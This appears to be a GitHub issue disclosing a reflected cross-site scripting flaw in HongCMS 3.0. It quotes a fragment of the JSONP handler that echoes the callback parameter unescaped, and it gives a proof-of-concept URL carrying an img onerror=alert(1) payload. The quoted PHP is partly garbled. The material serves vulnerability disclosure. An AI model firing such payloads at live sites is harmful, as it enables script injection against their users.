Skip to content

HongCMS 3.0 - XSS vulnerability #15

@BaoAnDaShu

Description

@BaoAnDaShu

1

Vulnerability location

'
test
'); if($function){ echo $function . '(' . $this->json->encode($arr) . ')'; //jsonp返回数据的格式 }else{ echo $this->json->encode($arr); //json返回数据的格式 } } } ?>

POC:ajax/myshop?callback=%3Cimg%20src=1%20onerror=alert(1)%20/%3E

2

Metadata

Metadata

Assignees

No one assigned

    Labels

    No labels
    No labels

    Projects

    No projects

    Milestone

    No milestone

    Relationships

    None yet

    Development

    No branches or pull requests

    Issue actions